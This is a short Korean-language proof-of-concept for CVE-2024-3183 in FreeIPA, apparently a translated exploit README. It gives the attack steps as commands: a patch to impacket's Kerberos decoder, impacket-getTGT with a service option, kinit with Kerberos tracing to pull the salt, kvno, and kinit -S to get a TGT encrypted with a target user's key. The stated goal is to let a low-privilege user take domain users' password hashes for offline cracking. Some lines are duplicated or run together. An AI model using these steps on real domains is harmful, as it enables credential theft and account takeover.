
CVE-2024-3183 (FreeIPA Rosting)에 대한 PoC
CVE-2024-3183 (FreeIPA Rosting)에 대한 POC
영향: 저권한 사용자가 모든 도메인 사용자의 비밀번호 해시를 획득하고 오프라인 무차별 대입 공격(kerberoasting)을 수행할 수 있습니다.
impacket-getTGT 패치:
impacket/krb5/kerberosv5.py에 decoder.decode.defaultErrorState = stGetValueDecoderByTag를 추가합니다.impacket/krb5/kerberosv5.py에 decoder.decode.defaultErrorState = stGetValueDecoderByTag를 추가합니다.-service 옵션과 -debug 옵션과 함께 impacket-getTGT를 사용할 수 있습니다.
impacket-getTGT test.local/user -debug -service adminkinit user

printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt

kvno admin


1 - TGS, 2 - SALT, 3 - 비밀번호.
kinit -S target user그러면 대상 사용자 키로 암호화된 TGT를 얻습니다.